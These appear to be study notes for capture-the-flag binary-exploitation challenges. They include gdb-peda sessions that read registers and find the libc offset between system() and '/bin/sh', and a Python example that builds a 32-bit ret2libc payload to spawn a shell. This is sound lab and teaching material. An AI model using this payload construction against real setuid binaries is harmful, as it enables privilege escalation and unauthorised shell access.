Binaries range
Related questions (the course does not provide the environment, but I tested with a different target machine and different binaries):
3 (Challenge 13) What are last 6 hex characters of the hash of RootFlagTwo.txt on machine 172.25.120.220? (Hint: MD5 Hash)
This one can be solved with a local privilege-escalation vulnerability; there is no need to actually write a ROP chain.
5 (Challenge 15) On the Target Machine 2 (172.25.120.220), analyze level-two binary file and find the value of the ss register at run time (include the 0x)? Ans: 0x2b
Commands (the registers only exist once the process is running, so run it to the breakpoint before reading them):
gdb ./<level-two binary>
b main
run
info registers
Actual test session (against a different binary; note that this one is 32-bit, so ss reads 0x7b here, while the 0x2b in the answer is what a 64-bit Linux process shows, as in the bash session under Challenge 12 below):
level0@rop:~$ gdb -q ./level0
Reading symbols from ./level0...(no debugging symbols found)...done.
gdb-peda$ b main
Breakpoint 1 at 0x8048257
gdb-peda$ start
[----------------------------------registers-----------------------------------]
EAX: 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
EBX: 0x0
ECX: 0x1
EDX: 0xbffff794 --> 0xbffff8b4 ("/home/level0/level0")
ESI: 0x80488e0 (<__libc_csu_fini>: push ebp)
EDI: 0xece99a02
EBP: 0xbffff6f8 --> 0xbffff768 --> 0x0
ESP: 0xbffff6f8 --> 0xbffff768 --> 0x0
EIP: 0x8048257 (<main+3>: and esp,0xfffffff0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804824f <frame_dummy+63>: jmp 0x80481a0 <register_tm_clones>
0x8048254 <main>: push ebp
0x8048255 <main+1>: mov ebp,esp
=> 0x8048257 <main+3>: and esp,0xfffffff0
0x804825a <main+6>: sub esp,0x30
0x804825d <main+9>: mov DWORD PTR [esp],0x80ab668
0x8048264 <main+16>: call 0x8048f40 <puts>
0x8048269 <main+21>: mov DWORD PTR [esp],0x80ab680
[------------------------------------stack-------------------------------------]
0000| 0xbffff6f8 --> 0xbffff768 --> 0x0
0004| 0xbffff6fc --> 0x8048445 (<__libc_start_main+421>: mov DWORD PTR [esp],eax)
0008| 0xbffff700 --> 0x1
0012| 0xbffff704 --> 0xbffff794 --> 0xbffff8b4 ("/home/level0/level0")
0016| 0xbffff708 --> 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
0020| 0xbffff70c --> 0x0
0024| 0xbffff710 --> 0x0
0028| 0xbffff714 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048257 in main ()
gdb-peda$ info register
eax 0xbffff79c 0xbffff79c
ecx 0x1 0x1
edx 0xbffff794 0xbffff794
ebx 0x0 0x0
esp 0xbffff6f8 0xbffff6f8
ebp 0xbffff6f8 0xbffff6f8
esi 0x80488e0 0x80488e0
edi 0xece99a02 0xece99a02
eip 0x8048257 0x8048257 <main+3>
eflags 0x246 [ PF ZF IF ]
cs 0x73 0x73
ss 0x7b 0x7b
ds 0x7b 0x7b
es 0x7b 0x7b
fs 0x0 0x0
gs 0x33 0x33
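The two register dumps on this page disagree about ss (0x7b in the 32-bit level0 run, 0x2b in the 64-bit bash run), and the reason is only visible once the selector is decoded: both are ring-3 data selectors, they just index different GDT entries because i386 and x86-64 Linux lay out the GDT differently. The following is an added example, not course material; it parses `info registers` lines copied from the sessions above (constructed input) and decodes the segment selectors with the standard x86 bit layout. The Linux selector names are from the kernel's GDT layout; everything else is assumed for illustration.

```python
"""Parse `info registers` output and decode x86 segment selectors.

Added example, not part of the course. The two dumps are constructed from
the 32-bit (level0) and 64-bit (bash) gdb sessions on this page.
"""

# Constructed input: a few lines from the level0 session (32-bit).
DUMP_32 = """\
eip 0x8048257 0x8048257 <main+3>
eflags 0x246 [ PF ZF IF ]
cs 0x73 0x73
ss 0x7b 0x7b
"""

# Constructed input: a few lines from the /bin/bash session (64-bit).
DUMP_64 = """\
r8 0x0 0
rip 0x555555583eb0 0x555555583eb0 <main>
cs 0x33 51
ss 0x2b 43
"""

# Linux GDT: user selectors always carry RPL 3 (values from arch/x86 headers).
LINUX_USER_SELECTORS = {
    0x73: "__USER_CS (i386)",
    0x7b: "__USER_DS (i386)",
    0x33: "__USER_CS (x86_64)",
    0x2b: "__USER_DS (x86_64)",
    0x23: "__USER32_CS (x86_64 compat mode)",
}


def parse_registers(dump):
    """Map register name -> integer value from gdb 'info registers' lines.

    gdb prints 'name  hex-value  natural-value'; only the hex column is used,
    so lines like 'eflags 0x246 [ PF ZF IF ]' still parse.
    """
    regs = {}
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1].startswith("0x"):
            regs[parts[0]] = int(parts[1], 16)
    return regs


def decode_selector(sel):
    """x86 selector: bits 1:0 = RPL, bit 2 = table (0 GDT / 1 LDT), bits 15:3 = index."""
    return {"index": sel >> 3, "table": "LDT" if sel & 4 else "GDT", "rpl": sel & 3}


def describe_mode(regs):
    """Tell 32-bit from 64-bit user code by the cs selector a Linux process runs with."""
    cs = regs["cs"]
    if cs == 0x33:
        return "64-bit"
    if cs in (0x73, 0x23):
        return "32-bit"
    return "unknown"


if __name__ == "__main__":
    for name, dump in (("level0", DUMP_32), ("bash", DUMP_64)):
        regs = parse_registers(dump)
        ss = regs["ss"]
        print(f"{name}: {describe_mode(regs)} process, ss={ss:#x} "
              f"{decode_selector(ss)} {LINUX_USER_SELECTORS.get(ss, '?')}")
```

Both ss values decode to RPL 3 in the GDT, which is why a 32-bit test binary cannot reproduce the 0x2b the question expects: that value comes from a 64-bit process, so check cs first to know which kind of binary you are looking at.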
6 (Challenge 16) On the Target Machine 2 (172.25.120.220), analyze level-two binary file and find the offset between the /bin/sh and the system() using dynamic analysis (hint: /bin/sh is greater than system(); include the 0x).
Commands (in gdb-peda, after start so that libc is mapped; before the process runs, p system will not give the libc address):
p system
find /bin/sh
Actual session:
level1@rop:~$ ls -l
total 20
-rw-rw-r-- 1 level0 level0 0 Mar 5 2015 bleh
-rw------- 1 level2 level2 53 Jan 20 2015 flag
-rwsr-xr-x 1 level2 level2 9235 Jan 20 2015 level1
-rw-rw-r-- 1 level1 level1 12 Apr 15 10:34 peda-session-level1.txt
level1@rop:~$ gdb -q ./level1
Reading symbols from ./level1...(no debugging symbols found)...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0xb7fd0000 --> 0x1aada8
ECX: 0xb192c7d7
EDX: 0xbffff724 --> 0xb7fd0000 --> 0x1aada8
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6f8 --> 0x0
ESP: 0xbffff6f8 --> 0x0
EIP: 0x8048d1c (<main+3>: and esp,0xfffffff0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048d18 <handle_conn+1027>: ret
0x8048d19 <main>: push ebp
0x8048d1a <main+1>: mov ebp,esp
=> 0x8048d1c <main+3>: and esp,0xfffffff0
0x8048d1f <main+6>: sub esp,0x30
0x8048d22 <main+9>: mov DWORD PTR [esp+0x2c],0xffffffff
0x8048d2a <main+17>: mov DWORD PTR [esp+0x28],0xffffffff
0x8048d32 <main+25>: mov DWORD PTR [esp+0x8],0x0
[------------------------------------stack-------------------------------------]
0000| 0xbffff6f8 --> 0x0
0004| 0xbffff6fc --> 0xb7e3ea83 (<__libc_start_main+243>: mov DWORD PTR [esp],eax)
0008| 0xbffff700 --> 0x1
0012| 0xbffff704 --> 0xbffff794 --> 0xbffff8b4 ("/home/level1/level1")
0016| 0xbffff708 --> 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
0020| 0xbffff70c --> 0xb7feccea (add ebx,0x12316)
0024| 0xbffff710 --> 0x1
0028| 0xbffff714 --> 0xbffff794 --> 0xbffff8b4 ("/home/level1/level1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x08048d1c in main ()
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7e65190 <system>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f86344 ("/bin/sh")
The offset is the difference between the two libc addresses: 0xb7f86344 - 0xb7e65190 = 0x1211b4. It stays the same across runs of the same libc build even with ASLR enabled; only the base address moves, which is why the offset, not the absolute address, is what a ret2libc chain relies on.
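How the offset from this session is actually used: once you have the runtime address of system() (from gdb with ASLR off, as here, or from an info leak), adding the offset gives the address of "/bin/sh", and the two go into a classic 32-bit ret2libc frame. The block below is an added example, not course code and not a solution for the level-two binary: it parses the p system / find output copied from the session above (constructed input), computes the offset, and lays out a payload. The padding length and the dummy return address are assumptions for illustration; the real distance to the saved EIP has to be measured on the target.

```python
"""Derive the system() -> "/bin/sh" offset from gdb-peda output and build
a 32-bit ret2libc frame from it.

Added example, not course code. PEDA_OUTPUT is constructed from the level1
session on this page; pad_len and ret_after below are assumed values.
"""
import re
import struct

# Constructed input: the relevant gdb-peda lines from the level1 session.
PEDA_OUTPUT = """\
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7e65190 <system>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f86344 ("/bin/sh")
"""

SYMBOL_RE = re.compile(r"^\$\d+ = \{[^}]*\} (0x[0-9a-f]+) <system>", re.M)
FIND_RE = re.compile(r'^(\S+) : (0x[0-9a-f]+) \("/bin/sh"\)', re.M)


def parse_addresses(text):
    """Return (system_addr, binsh_addr) from a peda transcript.

    Only a hit inside libc is accepted: a copy of the string on the stack or
    in the binary would give an offset that is meaningless relative to libc.
    """
    m = SYMBOL_RE.search(text)
    if not m:
        raise ValueError("no 'p system' result in transcript")
    system = int(m.group(1), 16)
    libc_hits = [int(addr, 16) for region, addr in FIND_RE.findall(text)
                 if region == "libc"]
    if not libc_hits:
        raise ValueError("no /bin/sh hit inside libc")
    return system, libc_hits[0]


def binsh_offset(system, binsh):
    """The value the challenge asks for; the hint says /bin/sh lies above system()."""
    if binsh <= system:
        raise ValueError("expected /bin/sh above system()")
    return binsh - system


def ret2libc_payload(pad_len, system_leak, offset, ret_after=0xdeadbeef):
    """32-bit ret2libc frame: [pad][system][return addr after system][&"/bin/sh"].

    pad_len: assumed distance from the buffer start to the saved EIP.
    system_leak: runtime address of system() for this process.
    ret_after: assumed; where system() returns to (0xdeadbeef just crashes).
    """
    binsh = system_leak + offset
    frame = struct.pack("<III", system_leak, ret_after, binsh)
    return b"A" * pad_len + frame


if __name__ == "__main__":
    system, binsh = parse_addresses(PEDA_OUTPUT)
    off = binsh_offset(system, binsh)
    print(f"system={system:#x} /bin/sh={binsh:#x} offset={off:#x}")
    payload = ret2libc_payload(pad_len=64, system_leak=system, offset=off)
    print(payload.hex())
```

The frame order matters on 32-bit: system() is entered via ret, so it expects its return address at [esp] and its first argument at [esp+4], which is why the dummy return address sits between system and the "/bin/sh" pointer. Under ASLR the parse step is replaced by a leak of any libc symbol, and the same offset arithmetic still applies.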
7 (Challenge 17) What is the address of /bin/bash within the executable file binaries-two (use the first address in the executable, not the stack) - (include the 0x)?
For the concrete steps see question 2 (Challenge 12) below. When searching with find in gdb-peda, every mapping containing the string is listed with its region name, so take the hit inside the binary's own mapping rather than the libc or [stack] entry, which is what the question means by "the first address in the executable, not the stack".
Related questions (solved):
These used ROP techniques.
2 (Challenge 12) What is the value in hex (include 0x) for the R8 register for BASH at run time on machine 172.25.120.210? Ans: 0x0
Steps (not the real answer, just an experiment on an arbitrary 64-bit binary; the r8 value at the main breakpoint is whatever the libc startup code left in it, so it depends on the libc build, not only on the binary):
┌──(kali㉿kali)-[~]
└─$ gdb -q /bin/bash
Reading symbols from /bin/bash...
(No debugging symbols found in /bin/bash)
(gdb) b main
Breakpoint 1 at 0x2feb0
(gdb) start
Temporary breakpoint 2 at 0x2feb0
Starting program: /usr/bin/bash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, 0x0000555555583eb0 in main ()
(gdb) info register
rax 0x555555583eb0 93824992427696
rbx 0x7fffffffdf88 140737488347016
rcx 0x55555567caf8 93824993446648
rdx 0x7fffffffdf98 140737488347032
rsi 0x7fffffffdf88 140737488347016
rdi 0x1 1
rbp 0x1 0x1
rsp 0x7fffffffde78 0x7fffffffde78
r8 0x0 0
r9 0x7ffff7fcf6a0 140737353938592
r10 0x7ffff7fcb878 140737353922680
r11 0x7ffff7fe18c0 140737354012864
r12 0x0 0
r13 0x7fffffffdf98 140737488347032
r14 0x55555567caf8 93824993446648
r15 0x7ffff7ffd020 140737354125344
rip 0x555555583eb0 0x555555583eb0 <main>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
4 (Challenge 14) What are the last 6 hex characters of the hash of RootFlag210.txt file on machine 172.25.120.210? (Hint: MD5 Hash)